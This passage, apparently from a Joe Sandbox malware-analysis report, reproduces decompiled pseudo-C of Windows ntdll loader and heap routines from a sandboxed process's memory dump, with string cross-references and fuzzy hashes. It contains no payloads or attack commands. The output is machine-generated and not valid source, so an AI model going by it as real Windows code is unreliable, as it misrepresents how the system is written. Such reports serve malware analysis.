                        							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                        								E1ED39B10( *((intOrPtr*)(_t48 + 0x48)));
                        								_t35 = _v12;
                        							}
                        							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                        						}
                        						goto L9;
                        					}
                        					if(_t49 != 0xc000008a) {
                        						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                        							if(_t49 != 0xc00000bb) {
                        								goto L8;
                        							}
                        						}
                        					}
                        					if(( *0x1edf5780 & 0x00000005) != 0) {
                        						_push(_t49);
                        						E1ED85510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                        						_t53 = _t53 + 0x1c;
                        					}
                        					_t49 = 0;
                        					goto L8;
                        				} else {
                        					goto L9;
                        				}
                        			}





















                        Strings
                        • minkernel\ntdll\ldrsnap.c, xrefs: 1ED7933B, 1ED79367
                        • LdrpFindDllActivationContext, xrefs: 1ED79331, 1ED7935D
                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1ED7932A
                        • Querying the active activation context failed with status 0x%08lx, xrefs: 1ED79357
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                        • API String ID: 0-3779518884
                        • Opcode ID: e263c49e11c7941ed6e432008cf74f83a04596044c3a9b22e85c18e6e7a35f3c
                        • Instruction ID: e71a11e5740aaf1cf53f17bba14c353af81305971c6fa43e51d8e33bb5e0c198
                        • Opcode Fuzzy Hash: e263c49e11c7941ed6e432008cf74f83a04596044c3a9b22e85c18e6e7a35f3c
                        • Instruction Fuzzy Hash: BB415DBAD003519FDB109B148C9AB6DF7B2BB00246F26437BE816775D0EB72EC808381
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 83%
                        			E1ED18794(void* __ecx) {
                        				signed int _v0;
                        				char _v8;
                        				signed int _v12;
                        				void* _v16;
                        				signed int _v20;
                        				intOrPtr _v24;
                        				signed int _v28;
                        				signed int _v32;
                        				signed int _v40;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr* _t77;
                        				signed int _t80;
                        				signed char _t81;
                        				signed int _t87;
                        				signed int _t91;
                        				void* _t92;
                        				void* _t94;
                        				signed int _t95;
                        				signed int _t103;
                        				signed int _t105;
                        				signed int _t110;
                        				signed int _t118;
                        				intOrPtr* _t121;
                        				intOrPtr _t122;
                        				signed int _t125;
                        				signed int _t129;
                        				signed int _t131;
                        				signed int _t134;
                        				signed int _t136;
                        				signed int _t143;
                        				signed int* _t147;
                        				signed int _t151;
                        				void* _t153;
                        				signed int* _t157;
                        				signed int _t159;
                        				signed int _t161;
                        				signed int _t166;
                        				signed int _t168;
                        
                        				_push(__ecx);
                        				_t153 = __ecx;
                        				_t159 = 0;
                        				_t121 = __ecx + 0x3c;
                        				if( *_t121 == 0) {
                        					L2:
                        					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                        					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                        						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                        						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                        						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                        							L6:
                        							if(E1ED1934A() != 0) {
                        								_t159 = E1ED8A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                        								__eflags = _t159;
                        								if(_t159 < 0) {
                        									_t81 =  *0x1edf5780; // 0x0
                        									__eflags = _t81 & 0x00000003;
                        									if((_t81 & 0x00000003) != 0) {
                        										_push(_t159);
                        										E1ED85510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                        										_t81 =  *0x1edf5780; // 0x0
                        									}
                        									__eflags = _t81 & 0x00000010;
                        									if((_t81 & 0x00000010) != 0) {
                        										asm("int3");
                        									}
                        								}
                        							}
                        						} else {
                        							_t159 = E1ED1849B(0, _t122, _t153, _t159, _t180);
                        							if(_t159 >= 0) {
                        								goto L6;
                        							}
                        						}
                        						_t80 = _t159;
                        						goto L8;
                        					} else {
                        						_t125 = 0x13;
                        						asm("int 0x29");
                        						_push(0);
                        						_push(_t159);
                        						_t161 = _t125;
                        						_t87 =  *( *[fs:0x30] + 0x1e8);
                        						_t143 = 0;
                        						_v40 = _t161;
                        						_t118 = 0;
                        						_push(_t153);
                        						__eflags = _t87;
                        						if(_t87 != 0) {
                        							_t118 = _t87 + 0x5d8;
                        							__eflags = _t118;
                        							if(_t118 == 0) {
                        								L46:
                        								_t118 = 0;
                        							} else {
                        								__eflags =  *(_t118 + 0x30);
                        								if( *(_t118 + 0x30) == 0) {
                        									goto L46;
                        								}
                        							}
                        						}
                        						_v32 = 0;
                        						_v28 = 0;
                        						_v16 = 0;
                        						_v20 = 0;
                        						_v12 = 0;
                        						__eflags = _t118;
                        						if(_t118 != 0) {
                        							__eflags = _t161;
                        							if(_t161 != 0) {
                        								__eflags =  *(_t118 + 8);
                        								if( *(_t118 + 8) == 0) {
                        									L22:
                        									_t143 = 1;
                        									__eflags = 1;
                        								} else {
                        									_t19 = _t118 + 0x40; // 0x40
                        									_t156 = _t19;
                        									E1ED18999(_t19,  &_v16);
                        									__eflags = _v0;
                        									if(_v0 != 0) {
                        										__eflags = _v0 - 1;
                        										if(_v0 != 1) {
                        											goto L22;
                        										} else {
                        											_t128 =  *(_t161 + 0x64);
                        											__eflags =  *(_t161 + 0x64);
                        											if( *(_t161 + 0x64) == 0) {
                        												goto L22;
                        											} else {
                        												E1ED18999(_t128,  &_v12);
                        												_t147 = _v12;
                        												_t91 = 0;
                        												__eflags = 0;
                        												_t129 =  *_t147;
                        												while(1) {
                        													__eflags =  *((intOrPtr*)(0x1edf5c60 + _t91 * 8)) - _t129;
                        													if( *((intOrPtr*)(0x1edf5c60 + _t91 * 8)) == _t129) {
                        														break;
                        													}
                        													_t91 = _t91 + 1;
                        													__eflags = _t91 - 5;
                        													if(_t91 < 5) {
                        														continue;
                        													} else {
                        														_t131 = 0;
                        														__eflags = 0;
                        													}
                        													L37:
                        													__eflags = _t131;
                        													if(_t131 != 0) {
                        														goto L22;
                        													} else {
                        														__eflags = _v16 - _t147;
                        														if(_v16 != _t147) {
                        															goto L22;
                        														} else {
                        															E1ED22280(_t92, 0x1edf86cc);
                        															_t94 = E1EDD9DFB( &_v20);
                        															__eflags = _t94 - 1;
                        															if(_t94 != 1) {
                        															}
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															 *_t118 =  *_t118 + 1;
                        															asm("adc dword [ebx+0x4], 0x0");
                        															_t95 = E1ED361A0( &_v32);
                        															__eflags = _t95;
                        															if(_t95 != 0) {
                        																__eflags = _v32 | _v28;
                        																if((_v32 | _v28) != 0) {
                        																	_t71 = _t118 + 0x40; // 0x3f
                        																	_t134 = _t71;
                        																	goto L55;
                        																}
                        															}
                        															goto L30;
                        														}
                        													}
                        													goto L56;
                        												}
                        												_t92 = 0x1edf5c64 + _t91 * 8;
                        												asm("lock xadd [eax], ecx");
                        												_t131 = (_t129 | 0xffffffff) - 1;
                        												goto L37;
                        											}
                        										}
                        										goto L56;
                        									} else {
                        										_t143 = E1ED18A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                        										__eflags = _t143;
                        										if(_t143 != 0) {
                        											_t157 = _v12;
                        											_t103 = 0;
                        											__eflags = 0;
                        											_t136 =  &(_t157[1]);
                        											 *(_t161 + 0x64) = _t136;
                        											_t151 =  *_t157;
                        											_v20 = _t136;
                        											while(1) {
                        												__eflags =  *((intOrPtr*)(0x1edf5c60 + _t103 * 8)) - _t151;
                        												if( *((intOrPtr*)(0x1edf5c60 + _t103 * 8)) == _t151) {
                        													break;
                        												}
                        												_t103 = _t103 + 1;
                        												__eflags = _t103 - 5;
                        												if(_t103 < 5) {
                        													continue;
                        												}
                        												L21:
                        												_t105 = E1ED4F380(_t136, 0x1ece1184, 0x10);
                        												__eflags = _t105;
                        												if(_t105 != 0) {
                        													__eflags =  *_t157 -  *_v16;
                        													if( *_t157 >=  *_v16) {
                        														goto L22;
                        													} else {
                        														asm("cdq");
                        														_t166 = _t157[5] & 0x0000ffff;
                        														_t108 = _t157[5] & 0x0000ffff;
                        														asm("cdq");
                        														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                        														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                        														if(__eflags > 0) {
                        															L29:
                        															E1ED22280(_t108, 0x1edf86cc);
                        															 *_t118 =  *_t118 + 1;
                        															_t42 = _t118 + 0x40; // 0x3f
                        															_t156 = _t42;
                        															asm("adc dword [ebx+0x4], 0x0");
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															asm("movsd");
                        															_t110 = E1ED361A0( &_v32);
                        															__eflags = _t110;
                        															if(_t110 != 0) {
                        																__eflags = _v32 | _v28;
                        																if((_v32 | _v28) != 0) {
                        																	_t134 = _v20;
                        																	L55:
                        																	E1EDD9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                        																}
                        															}
                        															L30:
                        															 *_t118 =  *_t118 + 1;
                        															asm("adc dword [ebx+0x4], 0x0");
                        															E1ED1FFB0(_t118, _t156, 0x1edf86cc);
                        															goto L22;
                        														} else {
                        															if(__eflags < 0) {
                        																goto L22;
                        															} else {
                        																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                        																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                        																	goto L22;
                        																} else {
                        																	goto L29;
                        																}
                        															}
                        														}
                        													}
                        													goto L56;
                        												}
                        												goto L22;
                        											}
                        											asm("lock inc dword [eax]");
                        											goto L21;
                        										}
                        									}
                        								}
                        							}
                        						}
                        						return _t143;
                        					}
                        				} else {
                        					_push( &_v8);
                        					_push( *((intOrPtr*)(__ecx + 0x50)));
                        					_push(__ecx + 0x40);
                        					_push(_t121);
                        					_push(0xffffffff);
                        					_t80 = E1ED49A00();
                        					_t159 = _t80;
                        					if(_t159 < 0) {
                        						L8:
                        						return _t80;
                        					} else {
                        						goto L2;
                        					}
                        				}
                        				L56:
                        			}

                        Strings
                        • minkernel\ntdll\ldrsnap.c, xrefs: 1ED69C28
                        • LdrpDoPostSnapWork, xrefs: 1ED69C1E
                        • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 1ED69C18
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                        • API String ID: 2994545307-1948996284
                        • Opcode ID: d84c8398717ab18ebaf32be44b741f76b553bc47c7fb9343d7817d17651188bc
                        • Instruction ID: f555af3ae0d9ef686b69cdb1ef485ca79f46085ce5819b18f29e940494922d2d
                        • Opcode Fuzzy Hash: d84c8398717ab18ebaf32be44b741f76b553bc47c7fb9343d7817d17651188bc
                        • Instruction Fuzzy Hash: 0291D279A002569FDB08CF59E8D2AAAF7B6FF44310B554769E845AF280D731ED01CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 98%
                        			E1ED17E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				char _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				char _v24;
                        				signed int _t73;
                        				void* _t77;
                        				char* _t82;
                        				char* _t87;
                        				signed char* _t97;
                        				signed char _t102;
                        				intOrPtr _t107;
                        				signed char* _t108;
                        				intOrPtr _t112;
                        				intOrPtr _t124;
                        				intOrPtr _t125;
                        				intOrPtr _t126;
                        
                        				_t107 = __edx;
                        				_v12 = __ecx;
                        				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                        				_t124 = 0;
                        				_v20 = __edx;
                        				if(E1ED1CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                        					_t112 = _v8;
                        				} else {
                        					_t112 = 0;
                        					_v8 = 0;
                        				}
                        				if(_t112 != 0) {
                        					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                        						_t124 = 0xc000007b;
                        						goto L8;
                        					}
                        					_t73 =  *(_t125 + 0x34) | 0x00400000;
                        					 *(_t125 + 0x34) = _t73;
                        					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                        						goto L3;
                        					}
                        					 *(_t125 + 0x34) = _t73 | 0x01000000;
                        					_t124 = E1ED0C9A4( *((intOrPtr*)(_t125 + 0x18)));
                        					if(_t124 < 0) {
                        						goto L8;
                        					} else {
                        						goto L3;
                        					}
                        				} else {
                        					L3:
                        					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                        						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                        						L8:
                        						return _t124;
                        					}
                        					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                        						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                        							goto L5;
                        						}
                        						_t102 =  *0x1edf5780; // 0x0
                        						if((_t102 & 0x00000003) != 0) {
                        							E1ED85510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                        							_t102 =  *0x1edf5780; // 0x0
                        						}
                        						if((_t102 & 0x00000010) != 0) {
                        							asm("int3");
                        						}
                        						_t124 = 0xc0000428;
                        						goto L8;
                        					}
                        					L5:
                        					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                        						goto L8;
                        					}
                        					_t77 = _a4 - 0x40000003;
                        					if(_t77 == 0 || _t77 == 0x33) {
                        						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                        						if(E1ED27D50() != 0) {
                        							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        						} else {
                        							_t82 = 0x7ffe0384;
                        						}
                        						_t108 = 0x7ffe0385;
                        						if( *_t82 != 0) {
                        							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                        								if(E1ED27D50() == 0) {
                        									_t97 = 0x7ffe0385;
                        								} else {
                        									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        								}
                        								if(( *_t97 & 0x00000020) != 0) {
                        									E1ED87016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                        								}
                        							}
                        						}
                        						if(_a4 != 0x40000003) {
                        							L14:
                        							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                        							if(E1ED27D50() != 0) {
                        								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        							} else {
                        								_t87 = 0x7ffe0384;
                        							}
                        							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                        								if(E1ED27D50() != 0) {
                        									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        								}
                        								if(( *_t108 & 0x00000020) != 0) {
                        									E1ED87016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                        								}
                        							}
                        							goto L8;
                        						} else {
                        							_v16 = _t125 + 0x24;
                        							_t124 = E1ED3A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                        							if(_t124 < 0) {
                        								E1ED0B1E1(_t124, 0x1490, 0, _v16);
                        								goto L8;
                        							}
                        							goto L14;
                        						}
                        					} else {
                        						goto L8;
                        					}
                        				}
                        			}

                        Strings
                        • minkernel\ntdll\ldrmap.c, xrefs: 1ED698A2
                        • Could not validate the crypto signature for DLL %wZ, xrefs: 1ED69891
                        • LdrpCompleteMapModule, xrefs: 1ED69898
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                        • API String ID: 0-1676968949
                        • Opcode ID: 69984d0f2d25956cb3a3a1fa4a43970dd9ac9fe9a970893632d2c1e2c52be2db
                        • Instruction ID: 13d939d13771b40ba358bcd6e52cccec918e58d5176cec031f0364cfee9f6c6c
                        • Opcode Fuzzy Hash: 69984d0f2d25956cb3a3a1fa4a43970dd9ac9fe9a970893632d2c1e2c52be2db
                        • Instruction Fuzzy Hash: 12512131A087829FD711CB69D850B9A7BE1EF0A314F5607A9E8919F7E1C730ED00CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E1ED0E620(void* __ecx, short* __edx, short* _a4) {
                        				char _v16;
                        				char _v20;
                        				intOrPtr _v24;
                        				char* _v28;
                        				char _v32;
                        				char _v36;
                        				char _v44;
                        				signed int _v48;
                        				intOrPtr _v52;
                        				void* _v56;
                        				void* _v60;
                        				char _v64;
                        				void* _v68;
                        				void* _v76;
                        				void* _v84;
                        				signed int _t59;
                        				signed int _t74;
                        				signed short* _t75;
                        				signed int _t76;
                        				signed short* _t78;
                        				signed int _t83;
                        				short* _t93;
                        				signed short* _t94;
                        				short* _t96;
                        				void* _t97;
                        				signed int _t99;
                        				void* _t101;
                        				void* _t102;
                        
                        				_t80 = __ecx;
                        				_t101 = (_t99 & 0xfffffff8) - 0x34;
                        				_t96 = __edx;
                        				_v44 = __edx;
                        				_t78 = 0;
                        				_v56 = 0;
                        				if(__ecx == 0 || __edx == 0) {
                        					L28:
                        					_t97 = 0xc000000d;
                        				} else {
                        					_t93 = _a4;
                        					if(_t93 == 0) {
                        						goto L28;
                        					}
                        					_t78 = E1ED0F358(__ecx, 0xac);
                        					if(_t78 == 0) {
                        						_t97 = 0xc0000017;
                        						L6:
                        						if(_v56 != 0) {
                        							_push(_v56);
                        							E1ED495D0();
                        						}
                        						if(_t78 != 0) {
                        							L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                        						}
                        						return _t97;
                        					}
                        					E1ED4FA60(_t78, 0, 0x158);
                        					_v48 = _v48 & 0x00000000;
                        					_t102 = _t101 + 0xc;
                        					 *_t96 = 0;
                        					 *_t93 = 0;
                        					E1ED4BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                        					_v36 = 0x18;
                        					_v28 =  &_v44;
                        					_v64 = 0;
                        					_push( &_v36);
                        					_push(0x20019);
                        					_v32 = 0;
                        					_push( &_v64);
                        					_v24 = 0x40;
                        					_v20 = 0;
                        					_v16 = 0;
                        					_t97 = E1ED49600();
                        					if(_t97 < 0) {
                        						goto L6;
                        					}
                        					E1ED4BB40(0,  &_v36, L"InstallLanguageFallback");
                        					_push(0);
                        					_v48 = 4;
                        					_t97 = L1ED0F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                        					if(_t97 >= 0) {
                        						if(_v52 != 1) {
                        							L17:
                        							_t97 = 0xc0000001;
                        							goto L6;
                        						}
                        						_t59 =  *_t78 & 0x0000ffff;
                        						_t94 = _t78;
                        						_t83 = _t59;
                        						if(_t59 == 0) {
                        							L19:
                        							if(_t83 == 0) {
                        								L23:
                        								E1ED4BB40(_t83, _t102 + 0x24, _t78);
                        								if(L1ED143C0( &_v48,  &_v64) == 0) {
                        									goto L17;
                        								}
                        								_t84 = _v48;
                        								 *_v48 = _v56;
                        								if( *_t94 != 0) {
                        									E1ED4BB40(_t84, _t102 + 0x24, _t94);
                        									if(L1ED143C0( &_v48,  &_v64) != 0) {
                        										 *_a4 = _v56;
                        									} else {
                        										_t97 = 0xc0000001;
                        										 *_v48 = 0;
                        									}
                        								}
                        								goto L6;
                        							}
                        							_t83 = _t83 & 0x0000ffff;
                        							while(_t83 == 0x20) {
                        								_t94 =  &(_t94[1]);
                        								_t74 =  *_t94 & 0x0000ffff;
                        								_t83 = _t74;
                        								if(_t74 != 0) {
                        									continue;
                        								}
                        								goto L23;
                        							}
                        							goto L23;
                        						} else {
                        							goto L14;
                        						}
                        						while(1) {
                        							L14:
                        							_t27 =  &(_t94[1]); // 0x2
                        							_t75 = _t27;
                        							if(_t83 == 0x2c) {
                        								break;
                        							}
                        							_t94 = _t75;
                        							_t76 =  *_t94 & 0x0000ffff;
                        							_t83 = _t76;
                        							if(_t76 != 0) {
                        								continue;
                        							}
                        							goto L23;
                        						}
                        						 *_t94 = 0;
                        						_t94 = _t75;
                        						_t83 =  *_t75 & 0x0000ffff;
                        						goto L19;
                        					}
                        				}
                        			}

                        Strings
                        • InstallLanguageFallback, xrefs: 1ED0E6DB
                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 1ED0E68C
                        • @, xrefs: 1ED0E6C0
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                        • API String ID: 0-1757540487
                        • Opcode ID: 3df476597419c3c3b6f8f9a2a1de54072f194602363ce1177eae6c73ee8b7fd7
                        • Instruction ID: f3b7030083013fd92d569c0436c5be735b0e17dbec91c218d62930cff4306f56
                        • Opcode Fuzzy Hash: 3df476597419c3c3b6f8f9a2a1de54072f194602363ce1177eae6c73ee8b7fd7
                        • Instruction Fuzzy Hash: 8D517F765083869BC701CF65C450BABB3E9BF88614F550FAEF985E7240E734EA44C7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 60%
                        			E1EDCE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                        				signed int _v20;
                        				char _v24;
                        				signed int _v40;
                        				char _v44;
                        				intOrPtr _v48;
                        				signed int _v52;
                        				unsigned int _v56;
                        				char _v60;
                        				signed int _v64;
                        				char _v68;
                        				signed int _v72;
                        				void* __ebx;
                        				void* __edi;
                        				char _t87;
                        				signed int _t90;
                        				signed int _t94;
                        				signed int _t100;
                        				intOrPtr* _t113;
                        				signed int _t122;
                        				void* _t132;
                        				void* _t135;
                        				signed int _t139;
                        				signed int* _t141;
                        				signed int _t146;
                        				signed int _t147;
                        				void* _t153;
                        				signed int _t155;
                        				signed int _t159;
                        				char _t166;
                        				void* _t172;
                        				void* _t176;
                        				signed int _t177;
                        				intOrPtr* _t179;
                        
                        				_t179 = __ecx;
                        				_v48 = __edx;
                        				_v68 = 0;
                        				_v72 = 0;
                        				_push(__ecx[1]);
                        				_push( *__ecx);
                        				_push(0);
                        				_t153 = 0x14;
                        				_t135 = _t153;
                        				_t132 = E1EDCBBBB(_t135, _t153);
                        				if(_t132 == 0) {
                        					_t166 = _v68;
                        					goto L43;
                        				} else {
                        					_t155 = 0;
                        					_v52 = 0;
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					asm("stosd");
                        					_v56 = __ecx[1];
                        					if( *__ecx >> 8 < 2) {
                        						_t155 = 1;
                        						_v52 = 1;
                        					}
                        					_t139 = _a4;
                        					_t87 = (_t155 << 0xc) + _t139;
                        					_v60 = _t87;
                        					if(_t87 < _t139) {
                        						L11:
                        						_t166 = _v68;
                        						L12:
                        						if(_t132 != 0) {
                        							E1EDCBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                        						}
                        						L43:
                        						if(_v72 != 0) {
                        							_push( *((intOrPtr*)(_t179 + 4)));
                        							_push( *_t179);
                        							_push(0x8000);
                        							E1EDCAFDE( &_v72,  &_v60);
                        						}
                        						L46:
                        						return _t166;
                        					}
                        					_t90 =  *(_t179 + 0xc) & 0x40000000;
                        					asm("sbb edi, edi");
                        					_t172 = ( ~_t90 & 0x0000003c) + 4;
                        					if(_t90 != 0) {
                        						_push(0);
                        						_push(0x14);
                        						_push( &_v44);
                        						_push(3);
                        						_push(_t179);
                        						_push(0xffffffff);
                        						if(E1ED49730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                        							_push(_t139);
                        							E1EDCA80D(_t179, 1, _v40, 0);
                        							_t172 = 4;
                        						}
                        					}
                        					_t141 =  &_v72;
                        					if(E1EDCA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                        						_v64 = _a4;
                        						_t94 =  *(_t179 + 0xc) & 0x40000000;
                        						asm("sbb edi, edi");
                        						_t176 = ( ~_t94 & 0x0000003c) + 4;
                        						if(_t94 != 0) {
                        							_push(0);
                        							_push(0x14);
                        							_push( &_v24);
                        							_push(3);
                        							_push(_t179);
                        							_push(0xffffffff);
                        							if(E1ED49730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                        								_push(_t141);
                        								E1EDCA80D(_t179, 1, _v20, 0);
                        								_t176 = 4;
                        							}
                        						}
                        						if(E1EDCA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                        							goto L11;
                        						} else {
                        							_t177 = _v64;
                        							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                        							_t100 = _v52 + _v52;
                        							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                        							 *(_t132 + 0x10) = _t146;
                        							asm("bsf eax, [esp+0x18]");
                        							_v52 = _t100;
                        							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                        							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                        							_t47 =  &_a8;
                        							 *_t47 = _a8 & 0x00000001;
                        							if( *_t47 == 0) {
                        								E1ED22280(_t179 + 0x30, _t179 + 0x30);
                        							}
                        							_t147 =  *(_t179 + 0x34);
                        							_t159 =  *(_t179 + 0x38) & 1;
                        							_v68 = 0;
                        							if(_t147 == 0) {
                        								L35:
                        								E1ED1B090(_t179 + 0x34, _t147, _v68, _t132);
                        								if(_a8 == 0) {
                        									E1ED1FFB0(_t132, _t177, _t179 + 0x30);
                        								}
                        								asm("lock xadd [eax], ecx");
                        								asm("lock xadd [eax], edx");
                        								_t132 = 0;
                        								_v72 = _v72 & 0;
                        								_v68 = _v72;
                        								if(E1ED27D50() == 0) {
                        									_t113 = 0x7ffe0388;
                        								} else {
                        									_t177 = _v64;
                        									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        								}
                        								if( *_t113 == _t132) {
                        									_t166 = _v68;
                        									goto L46;
                        								} else {
                        									_t166 = _v68;
                        									E1EDBFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                        									goto L12;
                        								}
                        							} else {
                        								L23:
                        								while(1) {
                        									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                        										_t122 =  *_t147;
                        										if(_t159 == 0) {
                        											L32:
                        											if(_t122 == 0) {
                        												L34:
                        												_v68 = 0;
                        												goto L35;
                        											}
                        											L33:
                        											_t147 = _t122;
                        											continue;
                        										}
                        										if(_t122 == 0) {
                        											goto L34;
                        										}
                        										_t122 = _t122 ^ _t147;
                        										goto L32;
                        									}
                        									_t122 =  *(_t147 + 4);
                        									if(_t159 == 0) {
                        										L27:
                        										if(_t122 != 0) {
                        											goto L33;
                        										}
                        										L28:
                        										_v68 = 1;
                        										goto L35;
                        									}
                        									if(_t122 == 0) {
                        										goto L28;
                        									}
                        									_t122 = _t122 ^ _t147;
                        									goto L27;
                        								}
                        							}
                        						}
                        					}
                        					_v72 = _v72 & 0x00000000;
                        					goto L11;
                        				}
                        			}

                        Strings
                        Memory Dump Source
